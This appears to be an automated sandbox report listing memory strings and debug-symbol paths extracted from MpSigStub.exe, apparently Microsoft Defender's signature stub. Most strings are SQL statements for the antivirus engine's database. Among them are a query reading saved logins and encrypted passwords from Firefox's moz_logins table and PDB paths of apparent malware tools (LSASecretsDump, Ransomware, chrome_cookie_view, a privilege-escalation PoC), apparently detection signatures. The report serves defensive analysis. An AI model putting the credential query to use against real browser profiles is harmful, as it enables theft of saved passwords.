Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SystemRegistryCache(Key, FileIDHash, RegPath, RegOperation, NewRegType, OldRegType, OldRegData, NewRegData, InstanceTimeStamp) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime, UpdateTime) VALUES(? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO File(SHA1, MD5, lshashs, lshash, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n, Size, SHA256) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?, ?, ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(23, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM RollingQueuesValues;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(15, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(10, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmProcessInfo(PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High)VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BackupProcessInfo;
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT FileInstance.ID FROM FileInstance, RecordIdentifier WHERE FileInstance.RecordID = RecordIdentifier.ID AND RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory;[3
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT RecordIdentifier.Key, FileInstance.RecordID, RecordIdentifier.RecordTimeStamp, FileInstance.TrackingEnabled, FileInstance.StorageEvent, FileInstance.StorageEventState, FileInstance.ModificationsCount, FileInstance.ParentRecordID, FileInstance.Parent_FileEvent, FileInstance.Parent_FileName, RecordIdentifier.Generation, FileInstance.FileName, FileInstance.USN, FileInstance.CreateTime, FileInstance.LastAccessTime, FileInstance.LastWriteTime, FileInstance.Signer, FileInstance.SignerHash, FileInstance.Issuer, FileInstance.SigningTime, FileInstance.MOTW, FileInstance.MOTWFromParent, FileInstance.IsValidCert, FileInstance.CertInvalidDetails, FileInstance.IsCatalogSigned, File.SHA1, File.MD5, File.lshashs, File.lshash, File.PartialCRC1, File.PartialCRC2, File.PartialCRC3, File.KCRC1, File.KCRC2, File.KCRC3, File.KCRC3n, File.Size, File.SHA256, ParentProcessInfo.CommandLine, ParentProcessInfo.FileName, ParentProcessInfo.IntegrityLevel, ParentProcessInfo.ProcessId, ParentProcessInfo.StartTime, ParentProcessInfo.TokenElevation, ParentProcessInfo.TokenElevationType, RemoteProcessInfo.CommandLine, RemoteProcessInfo.FileName, RemoteProcessInfo.IntegrityLevel, RemoteProcessInfo.TokenElevation, RemoteProcessInfo.TokenElevationType, ScanInfo.NamedAttributes, ScanInfo.PeAttributes, ScanInfo.PersistSigSeq, ScanInfo.ProgenitorPersistSigSeq, ScanInfo.ScanAgent, ScanInfo.ScanReason, ScanInfo.SigAttrEvents, ScanInfo.SigSeq, ScanInfo.SigSha, ScanInfo.WebURL,Engine.EngineVersion, Engine.SigVersion FROM RecordIdentifier INNER JOIN (FileInstance INNER JOIN File ON FileInstance.FileID = File.ID LEFT OUTER JOIN ProcessInfo as 'ParentProcessInfo' ON FileInstance.Parent_ProcessID = ParentProcessInfo.ID LEFT OUTER JOIN ProcessInfo as 'RemoteProcessInfo' ON FileInstance.Remote_ProcessID = RemoteProcessInfo.ID LEFT OUTER JOIN (ScanInfo INNER JOIN Engine ON ScanInfo.EngineID = Engine.ID) ON FileInstance.ScanID = ScanInfo.ID ) ON RecordIdentifier.ID = FileInstance.RecordID WHERE RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(9, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ?, UpdateTime = ?, WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM DynSigRevisions;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmProcessInfo;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ValueMapArray(Key, RecordType, ValueMapArrayBlob, InstanceTimeStamp) VALUES(?, ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AttributeCounts WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileHashes;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RecordIdentifier(Key, RecordTimeStamp, Generation) VALUES(?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(27, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO NetworkIpFirewallRules(Key, FirewallRuleName, ExpiryTime) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(7, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;DELETE FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?; INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache;DELETE FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;2
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE ExpireTime < ?; SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(2, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?N
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: select hostname, encryptedUsername, encryptedPassword from moz_logins where hostname like "moz-proxy://%s%%";
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributeCounts SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT (SELECT COUNT(*) FROM File) + (SELECT COUNT(*) FROM FileInstance);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(25, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT Count(1) FROM BmFileInfo;SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;DELETE FROM BmFileActions;DELETE FROM BmFileInfo;B
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE ExpireTime < ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmFileStartupActions;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Engine(EngineVersion, SigVersion) VALUES(? , ? );
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2644:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7040
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1412:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2644:304:WilStaging_02
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source: Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp
Source: Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source: Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp
Source: Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.2857096900.0000000005434000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918404291.00000000030C0000.00000004.00000001.sdmp
Source: Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source: Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp
Source: Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source: Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\binplace.exe source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: dciman32.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: Release\NexGenMediaPlayerApp.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source: Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp
Source: Binary string: \BeamWinHTTP\Release\BeamWinHTTP.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: he#@1.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: +020202020202020202020202020202020202020.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source: Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source: Binary string: \bin\DownloaderExe.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source: Binary string: fastfat.pdbN source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: wl-cmd\Release\dll1.pdb source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source: Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source: Binary string: sctasks.pdbd source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source: Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source: Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source: Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: usp10.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: reg.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: mgr.pdb source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp
Source: Binary string: \Release\ComBroadcaster.pdb source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp
Source: Binary string: bot.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\SkypeSpread.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source: Binary string: comp.pdbd source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp
Source: Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: c:\Documents and Settings\Administrator\My Documents\Visual Studio Projects\EASZZCDFR\Release\EASZZCDFR.pdb source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdbx source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source: Binary string: -C:\backward\inch\enumeration\Atmel\neces.pdb source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source: Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp
Source: Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb] source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
